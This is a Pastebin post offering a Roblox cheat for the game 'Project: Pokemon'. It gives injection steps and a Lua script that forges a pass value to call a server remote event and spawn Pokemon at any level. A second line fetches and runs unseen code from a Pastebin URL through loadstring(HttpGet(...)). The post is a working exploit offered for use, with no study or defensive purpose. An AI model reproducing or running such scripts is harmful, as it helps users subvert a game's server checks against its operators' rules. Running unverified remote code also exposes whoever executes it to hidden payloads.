Advertisement
Guest User

[StarterExploits] Project: Pokemon Spawn Script

a guest
Nov 25th, 2018
72,226
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.88 KB | None | 0 0
  1. https://v3rmillion.net/showthread.php?tid=708122
  2. Credits: NotPr0, Eren#8501
  3.  
  4. Steps:
  5. 1. Join ANY Project: Pokemon Remake
  6. 2. Inject your exploit
  7. 3. Execute SCRIPT 1 FIRST
  8. 4. THEN execute SCRIPT 2
  9. 5. Done
  10. (IF SCRIPT 2 DOES NOT WORK copy the script from this link: https://pastebin.com/raw/8qrgSuaU
  11.  
  12. Script 1:
  13.  
  14. _G.PlayingCheckers = function(pokemon, party, level, leavethistrueiguess)
  15. local Encrypt = function(CodeSource)
  16. local StringCode = '';
  17. for i = 1, #CodeSource do
  18. StringCode = StringCode ..string.char(48)..string.byte(string.sub(CodeSource,i,i));
  19. end
  20. return StringCode;
  21. end
  22.  
  23. local pass = Encrypt(game.Players.LocalPlayer.Name..level..pokemon)
  24.  
  25. game.ReplicatedStorage.REvents.Pokemon.iwillknowXD:InvokeServer(pokemon, party, level, leavethistrueiguess, leavethistrueiguess, pass)
  26. end
  27.  
  28.  
  29.  
  30. Script 2:
  31.  
  32. loadstring(game:HttpGet("https://pastebin.com/raw/8qrgSuaU", true))()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement